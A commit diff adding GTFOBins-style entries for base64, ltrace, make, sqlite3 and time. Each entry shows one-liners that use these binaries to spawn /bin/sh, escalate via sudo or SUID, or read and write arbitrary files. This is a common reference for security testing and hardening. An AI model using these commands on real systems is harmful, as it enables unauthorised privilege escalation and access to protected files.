Add base64, ltrace, make, sqlite3, time

_gtfobins/base64.md

@@ -0,0 +1,15 @@
+---
+functions:
+  sudo-enabled:
+    - code: |
+        LFILE=file_to_read
+        sudo base64 "$LFILE" | base64 --decode
+  suid-enabled:
+    - code: |
+        LFILE=file_to_read
+        ./base64 "$LFILE" | base64 --decode
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        base64 "$LFILE" | base64 --decode
+---

_gtfobins/ltrace.md

@@ -0,0 +1,7 @@
+---
+functions:
+  execute-interactive:
+    - code: ltrace -b -L /bin/sh
+  sudo-enabled:
+    - code: sudo ltrace -b -L /bin/sh
+---

_gtfobins/make.md

@@ -0,0 +1,33 @@
+---
+description: |
+  All these examples only work with GNU `make` due to the lack of support of the
+  `--eval` flag. The same can be achieved by using a proper `Makefile` of by
+  passing the content via stdin, that is:
+
+  ```
+  make -s --eval=<commands>
+  ```
+
+  becomes:
+
+  ```
+  make -s -f <(echo <commands>)
+  ```
+functions:
+  execute-interactive:
+    - code: |
+        COMMAND='/bin/sh'
+        make -s --eval=$'x:\n\t-'"$COMMAND"
+  sudo-enabled:
+    - code: |
+        COMMAND='/bin/sh'
+        sudo make -s --eval=$'x:\n\t-'"$COMMAND"
+  suid-enabled:
+    - code: |
+        COMMAND='/bin/sh'
+        ./make -s --eval=$'x:\n\t-'"$COMMAND"
+  file-write:
+    - code: |
+        LFILE=file_to_write
+        make -s --eval="\$(file >$LFILE,data)" .
+---

_gtfobins/sqlite3.md

@@ -0,0 +1,21 @@
+---
+functions:
+  execute-interactive:
+    - code: sqlite3 /dev/null '.shell /bin/sh'
+  sudo-enabled:
+    - code: sudo sqlite3 /dev/null '.shell /bin/sh'
+  suid-limited:
+    - code: ./sqlite3 /dev/null '.shell /bin/sh'
+  file-write:
+    - code: |
+        LFILE=file_to_write
+        sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        sqlite3 << EOF
+        CREATE TABLE t(line TEXT);
+        .import $LFILE t
+        SELECT * FROM t;
+        EOF
+---

_gtfobins/time.md

@@ -0,0 +1,12 @@
+---
+description: |
+  Note that the shell might have its own builtin time implementation, which may
+  behave differently than` /usr/bin/time`, hence the absolute path.
+functions:
+  execute-interactive:
+    - code: /usr/bin/time /bin/sh
+  sudo-enabled:
+    - code: sudo /usr/bin/time /bin/sh
+  suid-enabled:
+    - code: ./time /bin/sh -p
+---